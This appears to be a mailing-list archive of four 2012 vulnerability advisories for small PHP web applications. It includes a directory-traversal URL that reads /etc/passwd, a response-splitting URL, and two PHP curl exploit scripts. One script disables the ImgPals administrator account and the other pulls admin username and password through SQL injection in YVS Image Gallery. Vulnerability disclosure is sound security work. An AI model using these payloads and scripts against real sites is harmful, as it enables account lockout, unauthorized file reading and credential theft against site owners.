Ad Manager Pro v. 4 Remote FLI

2012-08-23 Thread CorryL
-=[ADVISORY---]=-

  Ad Manager Pro v. 4
Author: Corrado Liotta Aka CorryL [corry...@gmail.com]

-=[---]=-


-=[+] Application: Ad Manager Pro
-=[+] Version: 4
-=[+] Vendor's URL: http://www.phpwebscripts.com/ad-manager-pro/
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: LFI
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Facebook: https://www.facebook.com/CorryL
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611
-=[+] WebSite: http://corryl80.blogspot.com/

...::[ Descriprion ]::..

Ad Manager Pro is the most complete ad management solution available.
You can use it to manage ads on your site(s), you also can sell
clicks, impressions and/or days range to advertisers and purchase
clicks and/or impressions from publishers. Features of this quality
system may bring you an interesting income.
You and your users have a real-time statistic for each ad (hourly,
daily, monthly statistic), also a graphical statistic is available.
Advertisers and publishers can order daily email reports. Each ad may
be used in multiple campaigns, each campaign has its own statistic and
configuration.
Support for classic banners (gif, jpg, png, swf), plain text/html ads,
ads from templates (Google AdWords style). You can display ads on
pages or in popup consoles. There are many ways to show ads on pages -
javascript, iframe, php include command. It lets you place the ads to
any webpage.
Option to load a new ad after a given number of seconds. Ads can be
targeted by countries,days,hours.


...::[ Bug ]::..

Local File Inclusion (also known as LFI) is the process of including
files on a server through the web browser.
This vulnerability occurs when a page include is not properly
sanitized, and allows directory traversal characters to be injected.


...::[ Proof Of Concept ]::..

http://remote-server/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

..::[ Disclousure Timeline ]::..

[23/08/2012] - Public Disclousure

-- 
Corrado Liotta A.k.a (CorryL)
Admin x0n3-h4ck Italian Security Team
Email: corry...@gmail.com
Slype: corrado_liotta
Facebook: http://www.facebook.com/home.php/CorryL
Twitter: https://twitter.com/#!/CorradoLiotta
Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611
WebSite: http://corryl80.blogspot.com/

Specialist in:
Bug Hunting
Security Audits
Penetration Test


ImgPals Photo Host Version 1.0 Admin Account Disactivation

2012-02-28 Thread CorryL
-=[ADVISORY---]=-

ImgPals Photo Host Version 1.0 STABLE

Author: Corrado Liotta Aka CorryL [corry...@gmail.com]
-=[---]=-


-=[+] Application: ImgPals Photo Host
-=[+] Version: 1.0 STABLE
-=[+] Vendor's URL: http://www.imgpals.com/forum/
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Admin Account Disactivation
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Facebook: https://www.facebook.com/CorryL
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611

...::[ Descriprion ]::..

I released the ImgPals Photo Host Version 1.0 STABLE


Features Include:

* Easy Install
* Full README file included
* Full Control Panel to control your site
* User Side Features
  o Multiple JQuery Uploads
  o Create and Edit Photo Albums
  o Make Albums Public or Private
  o Describe Albums and Photos
  o Move, Delete, Rename, Rotate, Rate, Comment, and Tag Photos
  o Add Friends
  o Chat with Friends
  o Update people with status wall posting
  o Manage Profile
  o Profile Avatar Uploads
  o Private Messaging
* And much more, be sure to check out the Demo


...::[ Bug ]::..

A attaker can remotely disable the account from administratore not
allowing the same to be able to access the site

...::[ Proof Of Concept ]::..

 if ($_GET['a'] == 'app0'){
 $sqlapprove = mysql_query(UPDATE members SET
approved = '0' WHERE id = '.$_GET['u'].');

by sending the command approve.php? u = a = 1  app0 a attaker can
disable the Administrator account.

...::[ Exploit ]::..

#!/usr/bin/php -f
?php


//Coded by Corrado Liotta For educational purpose only
//use php exploit.php server app0 or app1
//use app0 for admin account off
//use app1 for admin account on

$target = $argv[1];
$power = $argv[2]

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, http://$target/approve.php?u=1a=$power;);
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0));
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, /tmp/cookie_$target);
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);

echo $buf;
?


Mobile Mp3 Search Engine HTTP Response Splitting

2012-02-24 Thread CorryL
-=[ADVISORY---]=-

 Mobile Mp3 Search Engine 2.0
Author: Corrado Liotta Aka CorryL [corry...@gmail.com]

-=[---]=-


-=[+] Application: Mobile Mp3 Search Engine
-=[+] Version: 2.0
-=[+] Vendor's URL: http://www.php-search-engine.com/_mobile
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: HTTP Response Splitting
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Facebook: https://www.facebook.com/CorryL
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611

...::[ Descriprion ]::..

This mobile mp3 search engine is the first mp3 search engine with
mobile high end supported.
It is an automatic mobile mp3 search engine that using 4shared API
plus Google powered search engine.
The script comes with autocharts system, latest search, and direct
download link from 4shared.


...::[ Bug ]::..

HTTP Response Splitting

HTTP response splitting is a form of web application vulnerability,
resulting from the failure
of the application or its environment to properly sanitize input
values. It can be used to
perform cross-site scripting attacks, cross-user defacement, web cache
poisoning, and
similar exploits.


...::[ Proof Of Concept ]::..

http://remote-server/dl.php?url=http://www.google.it

..::[ Disclousure Timeline ]::..

[22/02/2012] - Vendor notification

-- 
Corrado Liotta         A.k.a (CorryL)
Email: corry...@gmail.com
Slype: corrado_liotta
Facebook: http://www.facebook.com/home.php/CorryL
Twitter: https://twitter.com/#!/CorradoLiotta
Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611

Specialist in:
Bug Hunting
Security Audits
Penetration Test


YVS Image Gallery Sql injection

2012-02-24 Thread CorryL
-=[ADVISORY---]=-

YVS Image Gallery

Author: Corrado Liotta Aka CorryL [corry...@gmail.com]
-=[---]=-


-=[+] Application: YVS Image Gallery
-=[+] Version: 0.0.0.1
-=[+] Vendor's URL: http://yvs.vacau.com/gallery.html
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Sql INJECTIONS
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Facebook: https://www.facebook.com/CorryL
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611
-=[+] +Google: https://plus.google.com/u/0/109396477464303670923

...::[ Descriprion ]::..

This is a small database driven gallery created to be implemented
within your existing site.
The coding is reasonably straight forward and can be easily moved into
your existing development
by anyone with basic understanding of PHP.
Only a first attempt at the system has a long way to go,
but it provides you with all the necessary tools to run your own
picture gallery,
such as uploading of multiple images and creation of thumbnails.
The gallery is distributed as free-ware but if you decide to use it in
any business or just decide that it's worth it,
any donations will be greatly appreciated. details will be made available soon.


...::[ Bug ]::..

exploiting this bug a remote attaker is able' to go up again to user
name and admin password



...::[ Proof Of Concept ]::..

http://Server-Victim/image_gallery/view_album.php?album_id=-1%20UNION%20%20SELECT%20username%20FROM%20user

...::[ Exploit ]::..

#!/usr/bin/php -f
?php
#
# view_album.php curl exploit
#


// Created by Corrado Liotta Aka CorryL
// For educational only
// use php exploit.php 127.0.0.1 username for admin username o
password for admin password

$target = $argv[1];
$info = $argv[2];

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL,
http://$target/image_gallery/view_album.php?album_id=-1%20UNION%20%20SELECT%20$info%20FROM%20user;);
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0));
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, /tmp/cookie_$target);
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);

echo $buf;
?

..::[ Disclousure Timeline ]::..

[23/02/2012] - No Vendor Information



-- 
Corrado Liotta         A.k.a (CorryL)
Email: corry...@gmail.com
Slype: corrado_liotta
Facebook: http://www.facebook.com/home.php/CorryL
Twitter: https://twitter.com/#!/CorradoLiotta
Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611

Specialist in:
Bug Hunting
Security Audits
Penetration Test